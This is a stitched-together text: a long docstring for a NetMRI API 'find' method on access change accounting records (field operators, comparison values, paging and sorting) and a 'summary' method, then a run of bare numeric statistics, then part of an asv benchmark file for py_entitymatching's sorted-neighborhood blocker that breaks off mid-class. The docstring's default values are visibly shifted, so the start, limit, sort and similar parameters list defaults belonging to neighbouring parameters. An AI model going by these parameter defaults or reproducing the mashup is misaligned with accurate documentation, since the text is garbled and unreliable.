:param op_ACAStartTime: The operator to apply to the field ACAStartTime. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ACAStartTime: The starting effective time of this record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ACAStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ACAStartTime: If op_ACAStartTime is specified, the field named in this input will be compared to the value in ACAStartTime using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ACAStartTime must be specified if op_ACAStartTime is specified.
:type val_f_ACAStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ACAStartTime: If op_ACAStartTime is specified, this value will be compared to the value in ACAStartTime using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ACAStartTime must be specified if op_ACAStartTime is specified.
:type val_c_ACAStartTime: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ACATimestamp: The operator to apply to the field ACATimestamp. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ACATimestamp: The date and time this record was collected or calculated. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ACATimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ACATimestamp: If op_ACATimestamp is specified, the field named in this input will be compared to the value in ACATimestamp using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ACATimestamp must be specified if op_ACATimestamp is specified.
:type val_f_ACATimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ACATimestamp: If op_ACATimestamp is specified, this value will be compared to the value in ACATimestamp using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ACATimestamp must be specified if op_ACATimestamp is specified.
:type val_c_ACATimestamp: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_AccessChangeAccountingID: The operator to apply to the field AccessChangeAccountingID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. AccessChangeAccountingID: The internal NetMRI identifier for this access accounting element. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_AccessChangeAccountingID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_AccessChangeAccountingID: If op_AccessChangeAccountingID is specified, the field named in this input will be compared to the value in AccessChangeAccountingID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_AccessChangeAccountingID must be specified if op_AccessChangeAccountingID is specified.
:type val_f_AccessChangeAccountingID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_AccessChangeAccountingID: If op_AccessChangeAccountingID is specified, this value will be compared to the value in AccessChangeAccountingID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_AccessChangeAccountingID must be specified if op_AccessChangeAccountingID is specified.
:type val_c_AccessChangeAccountingID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DataSourceID: The operator to apply to the field DataSourceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DataSourceID: If op_DataSourceID is specified, the field named in this input will be compared to the value in DataSourceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DataSourceID must be specified if op_DataSourceID is specified.
:type val_f_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DataSourceID: If op_DataSourceID is specified, this value will be compared to the value in DataSourceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DataSourceID must be specified if op_DataSourceID is specified.
:type val_c_DataSourceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_DeviceID: The operator to apply to the field DeviceID. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. DeviceID: The internal NetMRI identifier for the device for which we count the access statistics. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_DeviceID: If op_DeviceID is specified, the field named in this input will be compared to the value in DeviceID using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_DeviceID must be specified if op_DeviceID is specified.
:type val_f_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_DeviceID: If op_DeviceID is specified, this value will be compared to the value in DeviceID using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_DeviceID must be specified if op_DeviceID is specified.
:type val_c_DeviceID: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_FilterAdded: The operator to apply to the field FilterAdded. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. FilterAdded: The number of rules added by provisioning with NetMRI (including rollback operations). For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_FilterAdded: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_FilterAdded: If op_FilterAdded is specified, the field named in this input will be compared to the value in FilterAdded using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_FilterAdded must be specified if op_FilterAdded is specified.
:type val_f_FilterAdded: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_FilterAdded: If op_FilterAdded is specified, this value will be compared to the value in FilterAdded using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_FilterAdded must be specified if op_FilterAdded is specified.
:type val_c_FilterAdded: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_FilterAll: The operator to apply to the field FilterAll. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. FilterAll: The number of all rules defined in the device's configuration. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_FilterAll: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_FilterAll: If op_FilterAll is specified, the field named in this input will be compared to the value in FilterAll using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_FilterAll must be specified if op_FilterAll is specified.
:type val_f_FilterAll: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_FilterAll: If op_FilterAll is specified, this value will be compared to the value in FilterAll using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_FilterAll must be specified if op_FilterAll is specified.
:type val_c_FilterAll: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_FilterRemoved: The operator to apply to the field FilterRemoved. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. FilterRemoved: The number of rules removed by provisioning with NetMRI (including remediation). For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_FilterRemoved: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_FilterRemoved: If op_FilterRemoved is specified, the field named in this input will be compared to the value in FilterRemoved using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_FilterRemoved must be specified if op_FilterRemoved is specified.
:type val_f_FilterRemoved: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_FilterRemoved: If op_FilterRemoved is specified, this value will be compared to the value in FilterRemoved using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_FilterRemoved must be specified if op_FilterRemoved is specified.
:type val_c_FilterRemoved: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_FilterSetAdded: The operator to apply to the field FilterSetAdded. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. FilterSetAdded: The number of rule lists added by provisioning with NetMRI. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_FilterSetAdded: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_FilterSetAdded: If op_FilterSetAdded is specified, the field named in this input will be compared to the value in FilterSetAdded using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_FilterSetAdded must be specified if op_FilterSetAdded is specified.
:type val_f_FilterSetAdded: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_FilterSetAdded: If op_FilterSetAdded is specified, this value will be compared to the value in FilterSetAdded using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_FilterSetAdded must be specified if op_FilterSetAdded is specified.
:type val_c_FilterSetAdded: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_FilterSetAll: The operator to apply to the field FilterSetAll. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. FilterSetAll: The number of all rule lists defined in the device's configuration. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_FilterSetAll: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_FilterSetAll: If op_FilterSetAll is specified, the field named in this input will be compared to the value in FilterSetAll using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_FilterSetAll must be specified if op_FilterSetAll is specified.
:type val_f_FilterSetAll: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_FilterSetAll: If op_FilterSetAll is specified, this value will be compared to the value in FilterSetAll using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_FilterSetAll must be specified if op_FilterSetAll is specified.
:type val_c_FilterSetAll: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_FilterSetRemoved: The operator to apply to the field FilterSetRemoved. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. FilterSetRemoved: The number of rule lists removed by provisioning with NetMRI (including remediation). For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_FilterSetRemoved: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_FilterSetRemoved: If op_FilterSetRemoved is specified, the field named in this input will be compared to the value in FilterSetRemoved using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_FilterSetRemoved must be specified if op_FilterSetRemoved is specified.
:type val_f_FilterSetRemoved: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_FilterSetRemoved: If op_FilterSetRemoved is specified, this value will be compared to the value in FilterSetRemoved using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_FilterSetRemoved must be specified if op_FilterSetRemoved is specified.
:type val_c_FilterSetRemoved: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_FilterSetUnused: The operator to apply to the field FilterSetUnused. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. FilterSetUnused: The number of unused rule lists defined in the device's configuration. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_FilterSetUnused: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_FilterSetUnused: If op_FilterSetUnused is specified, the field named in this input will be compared to the value in FilterSetUnused using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_FilterSetUnused must be specified if op_FilterSetUnused is specified.
:type val_f_FilterSetUnused: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_FilterSetUnused: If op_FilterSetUnused is specified, this value will be compared to the value in FilterSetUnused using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_FilterSetUnused must be specified if op_FilterSetUnused is specified.
:type val_c_FilterSetUnused: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_FilterUnused: The operator to apply to the field FilterUnused. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. FilterUnused: The number of unused rules defined in the device's configuration. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_FilterUnused: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_FilterUnused: If op_FilterUnused is specified, the field named in this input will be compared to the value in FilterUnused using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_FilterUnused must be specified if op_FilterUnused is specified.
:type val_f_FilterUnused: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_FilterUnused: If op_FilterUnused is specified, this value will be compared to the value in FilterUnused using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_FilterUnused must be specified if op_FilterUnused is specified.
:type val_c_FilterUnused: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IPObjectAdded: The operator to apply to the field IPObjectAdded. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IPObjectAdded: The number of network objects added by provisioning with NetMRI. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IPObjectAdded: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IPObjectAdded: If op_IPObjectAdded is specified, the field named in this input will be compared to the value in IPObjectAdded using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IPObjectAdded must be specified if op_IPObjectAdded is specified.
:type val_f_IPObjectAdded: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IPObjectAdded: If op_IPObjectAdded is specified, this value will be compared to the value in IPObjectAdded using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IPObjectAdded must be specified if op_IPObjectAdded is specified.
:type val_c_IPObjectAdded: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IPObjectAll: The operator to apply to the field IPObjectAll. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IPObjectAll: The number of network objects defined in the device's configuration. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IPObjectAll: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IPObjectAll: If op_IPObjectAll is specified, the field named in this input will be compared to the value in IPObjectAll using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IPObjectAll must be specified if op_IPObjectAll is specified.
:type val_f_IPObjectAll: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IPObjectAll: If op_IPObjectAll is specified, this value will be compared to the value in IPObjectAll using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IPObjectAll must be specified if op_IPObjectAll is specified.
:type val_c_IPObjectAll: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IPObjectRemoved: The operator to apply to the field IPObjectRemoved. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IPObjectRemoved: The number of network objects removed by provisioning with NetMRI (including remediation). For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IPObjectRemoved: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IPObjectRemoved: If op_IPObjectRemoved is specified, the field named in this input will be compared to the value in IPObjectRemoved using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IPObjectRemoved must be specified if op_IPObjectRemoved is specified.
:type val_f_IPObjectRemoved: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IPObjectRemoved: If op_IPObjectRemoved is specified, this value will be compared to the value in IPObjectRemoved using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IPObjectRemoved must be specified if op_IPObjectRemoved is specified.
:type val_c_IPObjectRemoved: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_IPObjectUnused: The operator to apply to the field IPObjectUnused. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. IPObjectUnused: The number of network objects defined in the device's configuration that are not used in the configuration. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_IPObjectUnused: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_IPObjectUnused: If op_IPObjectUnused is specified, the field named in this input will be compared to the value in IPObjectUnused using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_IPObjectUnused must be specified if op_IPObjectUnused is specified.
:type val_f_IPObjectUnused: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_IPObjectUnused: If op_IPObjectUnused is specified, this value will be compared to the value in IPObjectUnused using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_IPObjectUnused must be specified if op_IPObjectUnused is specified.
:type val_c_IPObjectUnused: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ServiceAdded: The operator to apply to the field ServiceAdded. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ServiceAdded: The number of service objects added by provisioning with NetMRI. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ServiceAdded: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ServiceAdded: If op_ServiceAdded is specified, the field named in this input will be compared to the value in ServiceAdded using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ServiceAdded must be specified if op_ServiceAdded is specified.
:type val_f_ServiceAdded: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ServiceAdded: If op_ServiceAdded is specified, this value will be compared to the value in ServiceAdded using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ServiceAdded must be specified if op_ServiceAdded is specified.
:type val_c_ServiceAdded: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ServiceAll: The operator to apply to the field ServiceAll. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ServiceAll: The number of service objects defined in the device's configuration. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ServiceAll: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ServiceAll: If op_ServiceAll is specified, the field named in this input will be compared to the value in ServiceAll using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ServiceAll must be specified if op_ServiceAll is specified.
:type val_f_ServiceAll: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ServiceAll: If op_ServiceAll is specified, this value will be compared to the value in ServiceAll using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ServiceAll must be specified if op_ServiceAll is specified.
:type val_c_ServiceAll: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ServiceRemoved: The operator to apply to the field ServiceRemoved. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ServiceRemoved: The number of service objects removed by provisioning with NetMRI (including remediation). For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ServiceRemoved: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ServiceRemoved: If op_ServiceRemoved is specified, the field named in this input will be compared to the value in ServiceRemoved using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ServiceRemoved must be specified if op_ServiceRemoved is specified.
:type val_f_ServiceRemoved: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ServiceRemoved: If op_ServiceRemoved is specified, this value will be compared to the value in ServiceRemoved using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ServiceRemoved must be specified if op_ServiceRemoved is specified.
:type val_c_ServiceRemoved: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param op_ServiceUnused: The operator to apply to the field ServiceUnused. Valid values are: =, <>, rlike, not rlike, >, >=, <, <=, like, not like, is null, is not null, between. ServiceUnused: The number of service objects defined in the device's configuration that are not used in the configuration. For the between operator the value will be treated as an Array if comma delimited string is passed, and it must contain an even number of values.
:type op_ServiceUnused: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_f_ServiceUnused: If op_ServiceUnused is specified, the field named in this input will be compared to the value in ServiceUnused using the specified operator. That is, the value in this input will be treated as another field name, rather than a constant value. Either this field or val_c_ServiceUnused must be specified if op_ServiceUnused is specified.
:type val_f_ServiceUnused: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param val_c_ServiceUnused: If op_ServiceUnused is specified, this value will be compared to the value in ServiceUnused using the specified operator. The value in this input will be treated as an explicit constant value. Either this field or val_f_ServiceUnused must be specified if op_ServiceUnused is specified.
:type val_c_ServiceUnused: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the access change accountings as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` AccessChangeAccountingID
:param sort: The data field(s) to use for sorting the output. Default is AccessChangeAccountingID. Valid values are AccessChangeAccountingID, DataSourceID, DeviceID, FilterSetAll, FilterSetUnused, FilterSetAdded, FilterSetRemoved, FilterAll, FilterUnused, FilterAdded, FilterRemoved, IPObjectAll, IPObjectUnused, IPObjectAdded, IPObjectRemoved, ServiceAll, ServiceUnused, ServiceAdded, ServiceRemoved, ACAFirstSeenTime, ACAStartTime, ACAEndTime, ACATimestamp, ACAChangedCols.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each AccessChangeAccounting. Valid values are AccessChangeAccountingID, DataSourceID, DeviceID, FilterSetAll, FilterSetUnused, FilterSetAdded, FilterSetRemoved, FilterAll, FilterUnused, FilterAdded, FilterRemoved, IPObjectAll, IPObjectUnused, IPObjectAdded, IPObjectRemoved, ServiceAll, ServiceUnused, ServiceAdded, ServiceRemoved, ACAFirstSeenTime, ACAStartTime, ACAEndTime, ACATimestamp, ACAChangedCols. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.3
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param xml_filter: A SetFilter XML structure to further refine the search. The SetFilter will be applied AFTER any search query or field values, but before any limit options. The limit and pagination will be enforced after the filter. Remind that this kind of filter may be costly and inefficient if not associated with a database filtering.
:type xml_filter: String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return access_change_accountings: An array of the AccessChangeAccounting objects that match the specified input criteria.
:rtype access_change_accountings: Array of AccessChangeAccounting
"""
return self.api_list_request(self._get_method_fullname("find"), kwargs)
def summary(self, **kwargs):
    """Returns a summary of accounting.

    **Inputs**

    :param starttime: time of starting period for summary computations
    :type starttime: DateTime

    :param endtime: time of ending period for summary computations
    :type endtime: DateTime

    :param device_group_set_ids: IDs of the device groups we want the summary for
    :type device_group_set_ids: Array of Integer

    :param device_ids: IDs of the devices we want the summary for
    :type device_ids: Array of Integer

    **Outputs**

    :return values: a hash containing summary-names and their numeric values.
    :rtype values: Hash
    """
    # Resolve the fully-qualified API method name, then forward the
    # caller-supplied keyword arguments unchanged.
    full_name = self._get_method_fullname("summary")
    return self.api_request(full_name, kwargs)
| 58.821035
| 782
| 0.632646
| 8,458
| 69,350
| 5.128163
| 0.037716
| 0.063633
| 0.041361
| 0.054088
| 0.942523
| 0.939941
| 0.906349
| 0.890672
| 0.885
| 0.884631
| 0
| 0.002659
| 0.28969
| 69,350
| 1,179
| 783
| 58.821035
| 0.877852
| 0.840865
| 0
| 0
| 0
| 0
| 0.057627
| 0.028249
| 0
| 0
| 0
| 0
| 0
| 1
| 0.384615
| false
| 0
| 0.076923
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 9
|
91380870376fc8358111f78bf34b05e774be162d
| 11,105
|
py
|
Python
|
benchmarks/benchmark_sn_blocker.py
|
dmvieira/py_entitymatching
|
25b48cf3a60f0cd05f25ffd38b735a461686eff7
|
[
"BSD-3-Clause"
] | 165
|
2016-08-28T14:30:01.000Z
|
2022-03-29T17:24:03.000Z
|
benchmarks/benchmark_sn_blocker.py
|
mvahit/py_entitymatching
|
6724081d7d95c547e5a51625b4a8207c6c1737f8
|
[
"MIT",
"BSD-2-Clause",
"BSD-3-Clause"
] | 70
|
2016-11-22T00:35:22.000Z
|
2022-03-11T22:26:26.000Z
|
benchmarks/benchmark_sn_blocker.py
|
mvahit/py_entitymatching
|
6724081d7d95c547e5a51625b4a8207c6c1737f8
|
[
"MIT",
"BSD-2-Clause",
"BSD-3-Clause"
] | 53
|
2016-09-22T02:07:34.000Z
|
2022-03-19T18:57:06.000Z
|
# Write the benchmarking functions here.
# See "Writing benchmarks" in the asv docs for more information.
import os
import sys
import py_entitymatching as mg
# Locate the example datasets bundled with the py_entitymatching install;
# every benchmark class below reads its A/B tables from this directory.
p = mg.get_install_path()
datasets_path = os.sep.join([p, 'datasets', 'example_datasets'])
# Single blocker instance shared by all benchmarks in this module.
snb = mg.SortedNeighborhoodBlocker()
class TimeBlockTablesAnime:
    """asv benchmark: tables-level blocking of the 'anime' dataset on 'Year'."""

    def setup(self):
        left_csv = os.sep.join([datasets_path, 'anime', 'A.csv'])
        right_csv = os.sep.join([datasets_path, 'anime', 'B.csv'])
        self.l_block_attr = 'Year'
        self.r_block_attr = 'Year'
        out_attrs = ['Title', 'Year', 'Episodes']
        self.l_output_attrs = out_attrs
        self.r_output_attrs = list(out_attrs)
        try:
            self.A = mg.read_csv_metadata(left_csv)
            mg.set_key(self.A, 'ID')
            self.B = mg.read_csv_metadata(right_csv)
            mg.set_key(self.B, 'ID')
        except AssertionError:
            print("Dataset \'anime\' not found. Please visit the project"
                  " website to download the dataset.")
            raise SystemExit

    def time_block_tables(self):
        # The operation asv times: one tables-level blocking pass.
        snb.block_tables(self.A, self.B,
                         self.l_block_attr, self.r_block_attr,
                         self.l_output_attrs, self.r_output_attrs)

    def teardown(self):
        # Drop per-iteration state so each run starts from a clean slate.
        for attr in ('A', 'B', 'l_block_attr', 'r_block_attr',
                     'l_output_attrs', 'r_output_attrs'):
            delattr(self, attr)
class TimeBlockTablesBikes:
    """asv benchmark: tables-level blocking of the 'bikes' dataset on 'city_posted'."""

    def setup(self):
        # Build CSV paths from the module-level datasets_path.
        # (Fix: removed a dead local `p = mg.get_install_path()` that
        # shadowed the module-level `p` and was never read.)
        path_for_A = os.sep.join([datasets_path, 'bikes', 'A.csv'])
        path_for_B = os.sep.join([datasets_path, 'bikes', 'B.csv'])
        try:
            self.A = mg.read_csv_metadata(path_for_A)
            mg.set_key(self.A, 'id')
            self.B = mg.read_csv_metadata(path_for_B)
            mg.set_key(self.B, 'id')
        except AssertionError:
            print("Dataset \'bikes\' not found. Please visit the project"
                  " website to download the dataset.")
            raise SystemExit
        self.l_block_attr = 'city_posted'
        self.r_block_attr = 'city_posted'
